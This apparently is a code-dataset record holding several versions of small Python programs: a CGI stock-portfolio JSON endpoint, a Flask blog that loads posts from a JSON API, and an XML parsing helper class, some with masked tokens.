"step-5": "from appConfig.App import app, db\nimport os\n\ndbDir = os.path.dirname(__file__)\n# staticFolder = '%sstatic' % os.sep\ndbDir = '%s%sappConfig%smine.db' % (dbDir, os.sep, os.sep)\n\nif not os.path.exists(dbDir):\n # 创建数据库并创建表\n db.create_all()\n\n\n# app._static_folder = staticFolder\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello Waeweorld!'\n\n\nif __name__ == '__main__':\n app.run()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
#!/usr/bin/python
import operator
import cgi, sys, LINK_HEADERS
import simplejson as json
from datetime import datetime
from dateutil import tz
from decimal import *
sys.path.insert(0, str(LINK_HEADERS.DAO_LINK))
from transaction_dao import Transaction_dao
from user_portfolio_dao import User_portfolio_dao
from user_stock_value_dao import User_stock_value_dao
from company_dao import Company_dao
from history_dao import History_dao
from sector_info_dao import Sector_info_dao
print "Content-Type: text/html\r\n\r\n"
form = cgi.FieldStorage()
if form.getvalue("username") != None:
username = form.getvalue("username")
if form.getvalue("filter") != None:
portfolio_filter = form.getvalue("filter")
if portfolio_filter == '1':
filter_flag = "ALL"
elif portfolio_filter == '2':
filter_flag = "ALGOS"
elif portfolio_filter == '0':
filter_flag = "USER"
else:
filter_flag = portfolio_filter
tdao = Transaction_dao()
u2 = User_stock_value_dao()
u1 = User_portfolio_dao()
cdao = Company_dao()
hdao = History_dao()
data={}
if filter_flag == "ALL":
t = hdao.select_all(username)
l = tdao.get_user_stock_list(username)
elif filter_flag == "ALGOS":
t = hdao.select_all_algo_trades(username)
l = tdao.get_all_algo_stock_list(username)
elif filter_flag == "USER":
t = hdao.select_all_user_trades(username)
l = tdao.get_only_user_stock_list(username)
else:
t = hdao.select_algo_trades(username, filter_flag)
l = tdao.get_algo_stock_list(username, filter_flag)
# HISTORY
if t:
data['transactions']={}
for i in range(len(t)):
data['transactions'][i]={}
#start date formatting
from_zone = tz.tzutc()
to_zone = tz.tzlocal()
date_time = t[i].get_trans_date()
date_time = date_time.strftime('%Y-%m-%d %H:%M:%S')
date_time = datetime.strptime(date_time, '%Y-%m-%d %H:%M:%S')
date_time = date_time.replace(tzinfo=from_zone)
updated_date_time = date_time.astimezone(to_zone)
updated_date_time = updated_date_time.strftime('%Y-%m-%d %H:%M:%S')
#end date formatting
data['transactions'][i]['trans_date'] = updated_date_time
data['transactions'][i]['trans_type'] = t[i].get_trans_type()
# try:
# data['transactions'][i]['name']=cdao.get_company_model(t[i].get_stock()).get_name()
# except:
# data['transactions'][i]['name']=""
data['transactions'][i]['stock'] = t[i].get_stock()
data['transactions'][i]['price'] = t[i].get_price()
data['transactions'][i]['total_price'] = t[i].get_total_price()
data['transactions'][i]['volume'] = t[i].get_volume()
else:
data['transactions']={}
data['transactions'][0]={}
data['transactions'][0]['trans_date'] = ""
data['transactions'][0]['trans_type'] = ""
data['transactions'][0]['name']=""
data['transactions'][0]['stock'] = ""
data['transactions'][0]['price'] = ""
data['transactions'][0]['total_price'] = ""
data['transactions'][0]['volume'] = ""
# OWNED STOCKS
sector_dao=Sector_info_dao()
data['sector_volume']={}
if l:
data['owned_stocks']={}
#total_stock_value = 0
# for i in range(len(l)):
# c = cdao.get_company_model(l[i])
c = cdao.get_list_of_company_models(l)
if c:
for i in range(len(c)):
try:
o = tdao.get_owned_stock_model(username, c[i].get_symbol(), c[i].get_ask())
except:
continue
data['owned_stocks'][i]={}
data['owned_stocks'][i]['name']=c[i].get_name()
data['owned_stocks'][i]['stock'] = c[i].get_symbol()
data['owned_stocks'][i]['current_shares'] = o.get_volume()
data['owned_stocks'][i]['current_price'] = c[i].get_ask()
data['owned_stocks'][i]['total_worth'] = o.get_total_worth()
data['owned_stocks'][i]['profit'] = o.get_profit()
#total_stock_value = Decimal(total_stock_value) + Decimal(o.get_total_worth())
#--------Code for chart - sector_volume:---
volume=o.get_volume()
symbol=c[i].get_symbol()
try:
sector=sector_dao.get_sector_by_symbol(symbol)
if(sector.strip()==''):sector="Other"
except:
sector="Other"
if(sector not in data['sector_volume']):
data['sector_volume'][sector]=volume;
else:
data['sector_volume'][sector]+=volume;
#----------end of code for chart--------
else:
data['owned_stocks']={}
data['owned_stocks'][0]={}
    # No stocks owned: emit one empty placeholder row so the client-side
    # table renderer always has a record to bind against.
    data['owned_stocks'][0]['name'] =""
    data['owned_stocks'][0]['stock'] = ""
    data['owned_stocks'][0]['current_shares'] = ""
    data['owned_stocks'][0]['current_price'] = ""
    data['owned_stocks'][0]['total_worth'] = ""
    data['owned_stocks'][0]['profit'] = ""
# PORTFOLIO INFORMATION
#---------------------Code for Chart Generation-----------------------------
# Build parallel axis/value lists for the sector-allocation chart out of the
# per-sector share volumes accumulated above in data['sector_volume'].
sectors=[]
volume=[]
sorted_volume=sorted(data['sector_volume'].items(),key=operator.itemgetter(1))
length=len(sorted_volume);
#Insertion Sort
# NOTE(review): sorted() above already ordered the pairs ascending by volume;
# this pass merely reverses them to descending.  reverse=True on sorted()
# would achieve both in one step.
for i in range(length):
    j=i
    while(j>0 and sorted_volume[j][1]>sorted_volume[j-1][1]):
        temp=sorted_volume[j-1]
        sorted_volume[j-1]=sorted_volume[j]
        sorted_volume[j]=temp
        j=j-1
# Cap the chart at the MAX largest sectors and drop the catch-all bucket.
MAX=35
for i in range(length):
    if(i>=MAX):break;
    if(sorted_volume[i][0]=='Other'):continue
    sectors.append(sorted_volume[i][0])
    volume.append(sorted_volume[i][1])
data['chart_axis']=sectors;
data['chart_data']=volume;
#--------------------------------end of code for chart--------------------#
# Portfolio totals; fall back to zeros when the user has no portfolio /
# stock-value rows yet.
up = u1.get_user_portfolio_model(username)
usv = u2.get_user_stock_value_model(username)
data['users']={}
if up:
    data['users']['total_portfolio'] = up.get_total_portfolio()
    data['users']['total_deposited'] = up.get_total_deposited()
    data['users']['available_funds'] = up.get_available_funds()
else:
    data['users']['total_portfolio'] = 0
    data['users']['total_deposited'] = 0
    data['users']['available_funds'] = 0
if usv:
    data['users']['total_stock_values'] = usv.get_total_stock_values()
    data['users']['profit'] = usv.get_profit()
else:
    data['users']['total_stock_values'] = 0
    data['users']['profit'] = 0
#----------------------------------code owned Stocks chart-----------------------------#
# Second chart: total worth per holding, largest first, same MAX cap.
owned_stocks=data['owned_stocks']
owned_stocks_graph_data={}
sorted_owned_stocks_chart_axis=[]
sorted_owned_stocks_chart_value=[]
for i in owned_stocks:
    owned_stocks_graph_data[owned_stocks[i]['stock']]=owned_stocks[i]['total_worth']
length=len(owned_stocks_graph_data);
sorted_data=sorted(owned_stocks_graph_data.items(),key=operator.itemgetter(1))
# Walk the ascending sort from the back so the biggest holdings come first.
for i in range(length-1,-1,-1):
    if(length-i>MAX):break
    sorted_owned_stocks_chart_axis.append(sorted_data[i][0])
    sorted_owned_stocks_chart_value.append(sorted_data[i][1])
data['owned_stocks_chart_axis']=sorted_owned_stocks_chart_axis;
data['owned_stocks_chart_value']=sorted_owned_stocks_chart_value;
# Python 2 print statement: the script's CGI response body is this JSON blob.
json_result = json.dumps(data)
print json_result
|
normal
|
{
"blob_id": "4264cba9a6c39219d21bd21d4b21009bacd1db38",
"index": 61,
"step-1": "#!/usr/bin/python\n\nimport operator\nimport cgi, sys, LINK_HEADERS\nimport simplejson as json\nfrom datetime import datetime\nfrom dateutil import tz\nfrom decimal import *\nsys.path.insert(0, str(LINK_HEADERS.DAO_LINK))\nfrom transaction_dao import Transaction_dao\nfrom user_portfolio_dao import User_portfolio_dao\nfrom user_stock_value_dao import User_stock_value_dao\nfrom company_dao import Company_dao\nfrom history_dao import History_dao\nfrom sector_info_dao import Sector_info_dao\nprint \"Content-Type: text/html\\r\\n\\r\\n\"\n\nform = cgi.FieldStorage()\n\nif form.getvalue(\"username\") != None:\n username = form.getvalue(\"username\")\nif form.getvalue(\"filter\") != None:\n portfolio_filter = form.getvalue(\"filter\")\n\n if portfolio_filter == '1':\n filter_flag = \"ALL\"\n elif portfolio_filter == '2':\n filter_flag = \"ALGOS\"\n elif portfolio_filter == '0':\n filter_flag = \"USER\"\n else:\n filter_flag = portfolio_filter\n \ntdao = Transaction_dao()\nu2 = User_stock_value_dao()\nu1 = User_portfolio_dao()\ncdao = Company_dao()\nhdao = History_dao()\n\ndata={}\n\nif filter_flag == \"ALL\":\n t = hdao.select_all(username)\n l = tdao.get_user_stock_list(username)\nelif filter_flag == \"ALGOS\":\n t = hdao.select_all_algo_trades(username)\n l = tdao.get_all_algo_stock_list(username)\nelif filter_flag == \"USER\":\n t = hdao.select_all_user_trades(username)\n l = tdao.get_only_user_stock_list(username)\nelse:\n t = hdao.select_algo_trades(username, filter_flag)\n l = tdao.get_algo_stock_list(username, filter_flag)\n\n\n# HISTORY\nif t:\n data['transactions']={}\n \n for i in range(len(t)):\n data['transactions'][i]={}\n\t\n\t #start date formatting\n from_zone = tz.tzutc()\n to_zone = tz.tzlocal()\n date_time = t[i].get_trans_date()\n date_time = date_time.strftime('%Y-%m-%d %H:%M:%S')\n date_time = datetime.strptime(date_time, '%Y-%m-%d %H:%M:%S')\t\n date_time = date_time.replace(tzinfo=from_zone)\n updated_date_time = 
date_time.astimezone(to_zone)\n updated_date_time = updated_date_time.strftime('%Y-%m-%d %H:%M:%S')\n\t #end date formatting\t\n\n data['transactions'][i]['trans_date'] = updated_date_time\n data['transactions'][i]['trans_type'] = t[i].get_trans_type()\n\n# try:\n# data['transactions'][i]['name']=cdao.get_company_model(t[i].get_stock()).get_name()\n# except:\n# data['transactions'][i]['name']=\"\"\n \n data['transactions'][i]['stock'] = t[i].get_stock()\n data['transactions'][i]['price'] = t[i].get_price()\n data['transactions'][i]['total_price'] = t[i].get_total_price()\n data['transactions'][i]['volume'] = t[i].get_volume()\nelse:\n data['transactions']={}\n data['transactions'][0]={}\n data['transactions'][0]['trans_date'] = \"\"\n data['transactions'][0]['trans_type'] = \"\"\n data['transactions'][0]['name']=\"\"\n data['transactions'][0]['stock'] = \"\"\n data['transactions'][0]['price'] = \"\"\n data['transactions'][0]['total_price'] = \"\"\n data['transactions'][0]['volume'] = \"\"\n \n\n\n# OWNED STOCKS\nsector_dao=Sector_info_dao()\ndata['sector_volume']={}\nif l:\n \n data['owned_stocks']={}\n #total_stock_value = 0\n \n# for i in range(len(l)):\n# c = cdao.get_company_model(l[i])\n \n c = cdao.get_list_of_company_models(l)\n if c:\n for i in range(len(c)):\n try:\n o = tdao.get_owned_stock_model(username, c[i].get_symbol(), c[i].get_ask()) \n except:\n continue\n \n data['owned_stocks'][i]={}\n data['owned_stocks'][i]['name']=c[i].get_name()\n data['owned_stocks'][i]['stock'] = c[i].get_symbol()\n data['owned_stocks'][i]['current_shares'] = o.get_volume()\n data['owned_stocks'][i]['current_price'] = c[i].get_ask()\n data['owned_stocks'][i]['total_worth'] = o.get_total_worth()\n data['owned_stocks'][i]['profit'] = o.get_profit()\n #total_stock_value = Decimal(total_stock_value) + Decimal(o.get_total_worth())\n\n #--------Code for chart - sector_volume:---\n volume=o.get_volume()\n symbol=c[i].get_symbol()\n try:\n 
sector=sector_dao.get_sector_by_symbol(symbol)\n if(sector.strip()==''):sector=\"Other\"\n except:\n sector=\"Other\"\n\n if(sector not in data['sector_volume']):\n data['sector_volume'][sector]=volume;\n else:\n data['sector_volume'][sector]+=volume;\n #----------end of code for chart--------\n \nelse:\n data['owned_stocks']={}\n data['owned_stocks'][0]={}\n data['owned_stocks'][0]['name'] =\"\"\n data['owned_stocks'][0]['stock'] = \"\"\n data['owned_stocks'][0]['current_shares'] = \"\"\n data['owned_stocks'][0]['current_price'] = \"\"\n data['owned_stocks'][0]['total_worth'] = \"\"\n data['owned_stocks'][0]['profit'] = \"\"\n\n# PORTFOLIO INFORMATION\n#---------------------Code for Chart Generation-----------------------------\nsectors=[]\nvolume=[]\n\nsorted_volume=sorted(data['sector_volume'].items(),key=operator.itemgetter(1))\nlength=len(sorted_volume);\n\n#Insertion Sort\nfor i in range(length):\n j=i\n while(j>0 and sorted_volume[j][1]>sorted_volume[j-1][1]):\n temp=sorted_volume[j-1]\n sorted_volume[j-1]=sorted_volume[j]\n sorted_volume[j]=temp\n j=j-1\n\nMAX=35\nfor i in range(length):\n if(i>=MAX):break;\n if(sorted_volume[i][0]=='Other'):continue\n sectors.append(sorted_volume[i][0])\n volume.append(sorted_volume[i][1])\n\n\ndata['chart_axis']=sectors;\ndata['chart_data']=volume;\n#--------------------------------end of code for chart--------------------#\n\nup = u1.get_user_portfolio_model(username)\nusv = u2.get_user_stock_value_model(username)\ndata['users']={}\n\nif up:\n data['users']['total_portfolio'] = up.get_total_portfolio()\n data['users']['total_deposited'] = up.get_total_deposited()\n data['users']['available_funds'] = up.get_available_funds()\nelse:\n data['users']['total_portfolio'] = 0\n data['users']['total_deposited'] = 0\n data['users']['available_funds'] = 0 \n\nif usv:\n data['users']['total_stock_values'] = usv.get_total_stock_values()\n data['users']['profit'] = usv.get_profit() \nelse:\n data['users']['total_stock_values'] = 0\n 
data['users']['profit'] = 0\n \n\n\n\n\n#----------------------------------code owned Stocks chart-----------------------------#\n\nowned_stocks=data['owned_stocks']\nowned_stocks_graph_data={}\n\nsorted_owned_stocks_chart_axis=[]\nsorted_owned_stocks_chart_value=[]\n\nfor i in owned_stocks:\n owned_stocks_graph_data[owned_stocks[i]['stock']]=owned_stocks[i]['total_worth']\n\nlength=len(owned_stocks_graph_data);\nsorted_data=sorted(owned_stocks_graph_data.items(),key=operator.itemgetter(1))\n\n\nfor i in range(length-1,-1,-1):\n if(length-i>MAX):break\n sorted_owned_stocks_chart_axis.append(sorted_data[i][0])\n sorted_owned_stocks_chart_value.append(sorted_data[i][1])\n\ndata['owned_stocks_chart_axis']=sorted_owned_stocks_chart_axis;\ndata['owned_stocks_chart_value']=sorted_owned_stocks_chart_value;\n\njson_result = json.dumps(data)\nprint json_result\n\n \n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
@app.route('/guess/<name>')
def guesser(name):
person = Person(name=name)
return render_template('guess.html', name=person.name, gender=person.
gender, age=person.age, country=person.country)
<|reserved_special_token_0|>
@app.route('/post/<int:id>')
def blog_post(id):
requested_post = None
for post in post_objects:
if post.id == id:
requested_post = post
return render_template('post.html', post=requested_post)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for post in all_posts:
post_obj = Post(post['id'], post['title'], post['subtitle'], post['body'])
post_objects.append(post_obj)
@app.route('/')
def home_page():
year = datetime.datetime.today().year
return render_template('index.html', current_year=year)
@app.route('/guess/<name>')
def guesser(name):
person = Person(name=name)
return render_template('guess.html', name=person.name, gender=person.
gender, age=person.age, country=person.country)
@app.route('/blog')
def blog():
return render_template('blog.html', posts=post_objects)
@app.route('/post/<int:id>')
def blog_post(id):
requested_post = None
for post in post_objects:
if post.id == id:
requested_post = post
return render_template('post.html', post=requested_post)
if __name__ == '__main__':
app.run(debug=True)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
app = Flask(__name__)
all_posts = all_posts = requests.get(
'https://api.npoint.io/5abcca6f4e39b4955965').json()
post_objects = []
for post in all_posts:
post_obj = Post(post['id'], post['title'], post['subtitle'], post['body'])
post_objects.append(post_obj)
@app.route('/')
def home_page():
year = datetime.datetime.today().year
return render_template('index.html', current_year=year)
@app.route('/guess/<name>')
def guesser(name):
person = Person(name=name)
return render_template('guess.html', name=person.name, gender=person.
gender, age=person.age, country=person.country)
@app.route('/blog')
def blog():
return render_template('blog.html', posts=post_objects)
@app.route('/post/<int:id>')
def blog_post(id):
requested_post = None
for post in post_objects:
if post.id == id:
requested_post = post
return render_template('post.html', post=requested_post)
if __name__ == '__main__':
app.run(debug=True)
<|reserved_special_token_1|>
from flask import Flask
from flask import render_template
import datetime
from person import Person
import requests
from post import Post
app = Flask(__name__)
all_posts = all_posts = requests.get(
'https://api.npoint.io/5abcca6f4e39b4955965').json()
post_objects = []
for post in all_posts:
post_obj = Post(post['id'], post['title'], post['subtitle'], post['body'])
post_objects.append(post_obj)
@app.route('/')
def home_page():
year = datetime.datetime.today().year
return render_template('index.html', current_year=year)
@app.route('/guess/<name>')
def guesser(name):
person = Person(name=name)
return render_template('guess.html', name=person.name, gender=person.
gender, age=person.age, country=person.country)
@app.route('/blog')
def blog():
return render_template('blog.html', posts=post_objects)
@app.route('/post/<int:id>')
def blog_post(id):
requested_post = None
for post in post_objects:
if post.id == id:
requested_post = post
return render_template('post.html', post=requested_post)
if __name__ == '__main__':
app.run(debug=True)
<|reserved_special_token_1|>
from flask import Flask
from flask import render_template
import datetime
from person import Person
import requests
from post import Post
app = Flask(__name__)
# Load all blog posts once at startup from the hosted JSON endpoint and wrap
# each record in a Post object for the templates to render.
# Fix: the original read `all_posts = all_posts = requests.get(...)` -- the
# same name chained twice, a confusing (if harmless) typo.
all_posts = requests.get(
    "https://api.npoint.io/5abcca6f4e39b4955965").json()
post_objects = []
for post in all_posts:
    # Post is constructed positionally: id, title, subtitle, body.
    post_obj = Post(post["id"], post["title"], post["subtitle"], post["body"])
    post_objects.append(post_obj)
@app.route('/')
def home_page():
    """Render the landing page, passing the current year for the footer."""
    current_year = datetime.datetime.today().year
    return render_template("index.html", current_year=current_year)
@app.route('/guess/<name>')
def guesser(name):
    """Build demographic guesses for *name* and render the guess page."""
    guessed = Person(name=name)
    # Same keyword arguments as before, gathered once for readability.
    context = {
        "name": guessed.name,
        "gender": guessed.gender,
        "age": guessed.age,
        "country": guessed.country,
    }
    return render_template("guess.html", **context)
@app.route('/blog')
def blog():
    """Render the blog index listing every post loaded at startup."""
    return render_template("blog.html", posts=post_objects)
@app.route('/post/<int:id>')
def blog_post(id):
    """Render the post whose id matches the URL; `post` is None when absent.

    Mirrors the original full scan: if ids ever repeated, the LAST match wins.
    """
    matching = [candidate for candidate in post_objects if candidate.id == id]
    requested_post = matching[-1] if matching else None
    return render_template("post.html", post=requested_post)
# Start the Flask development server (debug mode) only when run as a script,
# not when the module is imported.
if __name__ == "__main__":
    app.run(debug=True)
|
flexible
|
{
"blob_id": "895ece0b8d45cd64e43f8ddc54824f7647254185",
"index": 2547,
"step-1": "<mask token>\n\n\n@app.route('/guess/<name>')\ndef guesser(name):\n person = Person(name=name)\n return render_template('guess.html', name=person.name, gender=person.\n gender, age=person.age, country=person.country)\n\n\n<mask token>\n\n\n@app.route('/post/<int:id>')\ndef blog_post(id):\n requested_post = None\n for post in post_objects:\n if post.id == id:\n requested_post = post\n return render_template('post.html', post=requested_post)\n\n\n<mask token>\n",
"step-2": "<mask token>\nfor post in all_posts:\n post_obj = Post(post['id'], post['title'], post['subtitle'], post['body'])\n post_objects.append(post_obj)\n\n\n@app.route('/')\ndef home_page():\n year = datetime.datetime.today().year\n return render_template('index.html', current_year=year)\n\n\n@app.route('/guess/<name>')\ndef guesser(name):\n person = Person(name=name)\n return render_template('guess.html', name=person.name, gender=person.\n gender, age=person.age, country=person.country)\n\n\n@app.route('/blog')\ndef blog():\n return render_template('blog.html', posts=post_objects)\n\n\n@app.route('/post/<int:id>')\ndef blog_post(id):\n requested_post = None\n for post in post_objects:\n if post.id == id:\n requested_post = post\n return render_template('post.html', post=requested_post)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"step-3": "<mask token>\napp = Flask(__name__)\nall_posts = all_posts = requests.get(\n 'https://api.npoint.io/5abcca6f4e39b4955965').json()\npost_objects = []\nfor post in all_posts:\n post_obj = Post(post['id'], post['title'], post['subtitle'], post['body'])\n post_objects.append(post_obj)\n\n\n@app.route('/')\ndef home_page():\n year = datetime.datetime.today().year\n return render_template('index.html', current_year=year)\n\n\n@app.route('/guess/<name>')\ndef guesser(name):\n person = Person(name=name)\n return render_template('guess.html', name=person.name, gender=person.\n gender, age=person.age, country=person.country)\n\n\n@app.route('/blog')\ndef blog():\n return render_template('blog.html', posts=post_objects)\n\n\n@app.route('/post/<int:id>')\ndef blog_post(id):\n requested_post = None\n for post in post_objects:\n if post.id == id:\n requested_post = post\n return render_template('post.html', post=requested_post)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"step-4": "from flask import Flask\nfrom flask import render_template\nimport datetime\nfrom person import Person\nimport requests\nfrom post import Post\napp = Flask(__name__)\nall_posts = all_posts = requests.get(\n 'https://api.npoint.io/5abcca6f4e39b4955965').json()\npost_objects = []\nfor post in all_posts:\n post_obj = Post(post['id'], post['title'], post['subtitle'], post['body'])\n post_objects.append(post_obj)\n\n\n@app.route('/')\ndef home_page():\n year = datetime.datetime.today().year\n return render_template('index.html', current_year=year)\n\n\n@app.route('/guess/<name>')\ndef guesser(name):\n person = Person(name=name)\n return render_template('guess.html', name=person.name, gender=person.\n gender, age=person.age, country=person.country)\n\n\n@app.route('/blog')\ndef blog():\n return render_template('blog.html', posts=post_objects)\n\n\n@app.route('/post/<int:id>')\ndef blog_post(id):\n requested_post = None\n for post in post_objects:\n if post.id == id:\n requested_post = post\n return render_template('post.html', post=requested_post)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"step-5": "from flask import Flask\nfrom flask import render_template\nimport datetime\nfrom person import Person\nimport requests\nfrom post import Post\n\napp = Flask(__name__)\nall_posts = all_posts = requests.get(\n \"https://api.npoint.io/5abcca6f4e39b4955965\").json()\npost_objects = []\n\nfor post in all_posts:\n post_obj = Post(post[\"id\"], post[\"title\"], post[\"subtitle\"], post[\"body\"])\n post_objects.append(post_obj)\n\n\n@app.route('/')\ndef home_page():\n year = datetime.datetime.today().year\n return render_template(\"index.html\",\n current_year=year)\n\n\n@app.route('/guess/<name>')\ndef guesser(name):\n person = Person(name=name)\n return render_template(\"guess.html\",\n name=person.name,\n gender=person.gender,\n age=person.age,\n country=person.country,\n )\n\n\n@app.route('/blog')\ndef blog():\n return render_template(\"blog.html\", posts=post_objects)\n\n\n@app.route('/post/<int:id>')\ndef blog_post(id):\n requested_post = None\n for post in post_objects:\n if post.id == id:\n requested_post = post\n return render_template(\"post.html\", post=requested_post)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n",
"step-ids": [
2,
5,
6,
7,
8
]
}
|
[
2,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
class xmlSp:
def addNode(self, parentNode, childNode):
parentNode.append(childNode)
def createChildNode(self, key, value, propertyMap={}):
element = Element(key, propertyMap)
element.text = value
return element
<|reserved_special_token_0|>
def fetchSingleNode(self, nodeTree, xpathOrKey):
if xpathOrKey == None or xpathOrKey == '':
return None
elif len(xpathOrKey.split('/')) > 1:
return nodeTree.find(xpathOrKey)
else:
nodeList = nodeTree.getiterator(xpathOrKey)
if nodeList == None or len(nodeList) <= 0:
return nodeList
else:
return nodeList[0]
def fetchSingleNodeValue(self, nodeTree, xpathOrKey):
node = self.fetchSingleNode(nodeTree, xpathOrKey)
if node == None or len(node) <= 0 or node == '':
return ''
else:
return node.text
def fetchNodeList(self, nodeTree, xpathOrKey):
if xpathOrKey == None or xpathOrKey == '':
return None
elif len(xpathOrKey.split('/')) > 1:
return nodeTree.findall(xpathOrKey)
else:
return nodeTree.getiterator(xpathOrKey)
def fetchNodeValueList(self, nodeTree, xpathOrKey, key=''):
if xpathOrKey == None or xpathOrKey == '':
return None
else:
nodeValueList = []
nodeList = self.fetchNodeList(nodeTree, xpathOrKey)
for node in nodeList:
if node.tag == xpathOrKey:
nodeValueList.append(node.text)
return nodeValueList
def format(self, sourceXmlPath, destXmlPath, charset='UTF-8'):
global _exception
_exception = None
if os.path.exists(sourceXmlPath):
try:
fileRead = open(sourceXmlPath, 'r', encoding=charset)
fileWrite = open(destXmlPath, 'w', encoding=charset)
lines = fileRead.read()
nodeList = []
self.__writeXmlStruct(lines, nodeList, fileWrite)
fileRead.close()
fileWrite.close()
return True
except BaseException as error:
_exception = error
return False
else:
_exception = BaseException('File not exist!')
return False
<|reserved_special_token_0|>
def __analyNodeFlag(self, sourceStr):
global _exception
_exception = None
try:
nodeBegin = sourceStr.find('<')
nodeEnd = str(sourceStr).find('>')
if nodeBegin >= 0 and nodeEnd > 0:
node = sourceStr[nodeBegin:nodeEnd + 1]
nodeInnerText = sourceStr[nodeEnd + 1:]
return [node, nodeInnerText]
else:
return ['', sourceStr]
except BaseException as error:
_exception = error
return None
def __checkNodeFlagIsPair(self, nodeFlag1, nodeFlag2):
if len(nodeFlag1) > 0 and len(nodeFlag2) > 0:
nodeFlag1 = nodeFlag1[1:len(nodeFlag1) - 2]
nodeFlag2 = nodeFlag2[1:len(nodeFlag2) - 2]
nodeFlag1 = nodeFlag1.replace('/', '')
nodeFlag2 = nodeFlag2.replace('/', '')
if nodeFlag1 == nodeFlag2:
return True
return False
<|reserved_special_token_0|>
def modifyNodeValue(self, node, newValue, isAppend=False):
if node == None:
return False
else:
try:
if isAppend:
node.text += newValue
else:
node.text = newValue
return True
except:
return False
def writeXml(self, nodeTree, outPath, charset='utf-8'):
global _exception
_exception = None
try:
nodeTree.write(outPath, encoding=charset)
return True
except BaseException as error:
_exception = error
return False
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class xmlSp:
def addNode(self, parentNode, childNode):
parentNode.append(childNode)
def createChildNode(self, key, value, propertyMap={}):
element = Element(key, propertyMap)
element.text = value
return element
<|reserved_special_token_0|>
def fetchSingleNode(self, nodeTree, xpathOrKey):
if xpathOrKey == None or xpathOrKey == '':
return None
elif len(xpathOrKey.split('/')) > 1:
return nodeTree.find(xpathOrKey)
else:
nodeList = nodeTree.getiterator(xpathOrKey)
if nodeList == None or len(nodeList) <= 0:
return nodeList
else:
return nodeList[0]
def fetchSingleNodeValue(self, nodeTree, xpathOrKey):
node = self.fetchSingleNode(nodeTree, xpathOrKey)
if node == None or len(node) <= 0 or node == '':
return ''
else:
return node.text
def fetchNodeList(self, nodeTree, xpathOrKey):
if xpathOrKey == None or xpathOrKey == '':
return None
elif len(xpathOrKey.split('/')) > 1:
return nodeTree.findall(xpathOrKey)
else:
return nodeTree.getiterator(xpathOrKey)
def fetchNodeValueList(self, nodeTree, xpathOrKey, key=''):
if xpathOrKey == None or xpathOrKey == '':
return None
else:
nodeValueList = []
nodeList = self.fetchNodeList(nodeTree, xpathOrKey)
for node in nodeList:
if node.tag == xpathOrKey:
nodeValueList.append(node.text)
return nodeValueList
def format(self, sourceXmlPath, destXmlPath, charset='UTF-8'):
global _exception
_exception = None
if os.path.exists(sourceXmlPath):
try:
fileRead = open(sourceXmlPath, 'r', encoding=charset)
fileWrite = open(destXmlPath, 'w', encoding=charset)
lines = fileRead.read()
nodeList = []
self.__writeXmlStruct(lines, nodeList, fileWrite)
fileRead.close()
fileWrite.close()
return True
except BaseException as error:
_exception = error
return False
else:
_exception = BaseException('File not exist!')
return False
<|reserved_special_token_0|>
def __analyNodeFlag(self, sourceStr):
global _exception
_exception = None
try:
nodeBegin = sourceStr.find('<')
nodeEnd = str(sourceStr).find('>')
if nodeBegin >= 0 and nodeEnd > 0:
node = sourceStr[nodeBegin:nodeEnd + 1]
nodeInnerText = sourceStr[nodeEnd + 1:]
return [node, nodeInnerText]
else:
return ['', sourceStr]
except BaseException as error:
_exception = error
return None
def __checkNodeFlagIsPair(self, nodeFlag1, nodeFlag2):
if len(nodeFlag1) > 0 and len(nodeFlag2) > 0:
nodeFlag1 = nodeFlag1[1:len(nodeFlag1) - 2]
nodeFlag2 = nodeFlag2[1:len(nodeFlag2) - 2]
nodeFlag1 = nodeFlag1.replace('/', '')
nodeFlag2 = nodeFlag2.replace('/', '')
if nodeFlag1 == nodeFlag2:
return True
return False
def __fetchNodeNameFromStr(self, str):
str = str[1:len(str) - 1]
nodeName = str.replace('/', '')
return nodeName
def modifyNodeValue(self, node, newValue, isAppend=False):
if node == None:
return False
else:
try:
if isAppend:
node.text += newValue
else:
node.text = newValue
return True
except:
return False
def writeXml(self, nodeTree, outPath, charset='utf-8'):
global _exception
_exception = None
try:
nodeTree.write(outPath, encoding=charset)
return True
except BaseException as error:
_exception = error
return False
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class xmlSp:
def addNode(self, parentNode, childNode):
parentNode.append(childNode)
def createChildNode(self, key, value, propertyMap={}):
element = Element(key, propertyMap)
element.text = value
return element
def fetchXmlNodeTree(self, xmlPathOrXmlStr):
if xmlPathOrXmlStr == '':
return None
elif os.path.isfile(xmlPathOrXmlStr):
return ElementTree.parse(xmlPathOrXmlStr)
else:
return ElementTree.fromstring(xmlPathOrXmlStr)
def fetchSingleNode(self, nodeTree, xpathOrKey):
if xpathOrKey == None or xpathOrKey == '':
return None
elif len(xpathOrKey.split('/')) > 1:
return nodeTree.find(xpathOrKey)
else:
nodeList = nodeTree.getiterator(xpathOrKey)
if nodeList == None or len(nodeList) <= 0:
return nodeList
else:
return nodeList[0]
def fetchSingleNodeValue(self, nodeTree, xpathOrKey):
node = self.fetchSingleNode(nodeTree, xpathOrKey)
if node == None or len(node) <= 0 or node == '':
return ''
else:
return node.text
def fetchNodeList(self, nodeTree, xpathOrKey):
if xpathOrKey == None or xpathOrKey == '':
return None
elif len(xpathOrKey.split('/')) > 1:
return nodeTree.findall(xpathOrKey)
else:
return nodeTree.getiterator(xpathOrKey)
def fetchNodeValueList(self, nodeTree, xpathOrKey, key=''):
if xpathOrKey == None or xpathOrKey == '':
return None
else:
nodeValueList = []
nodeList = self.fetchNodeList(nodeTree, xpathOrKey)
for node in nodeList:
if node.tag == xpathOrKey:
nodeValueList.append(node.text)
return nodeValueList
def format(self, sourceXmlPath, destXmlPath, charset='UTF-8'):
global _exception
_exception = None
if os.path.exists(sourceXmlPath):
try:
fileRead = open(sourceXmlPath, 'r', encoding=charset)
fileWrite = open(destXmlPath, 'w', encoding=charset)
lines = fileRead.read()
nodeList = []
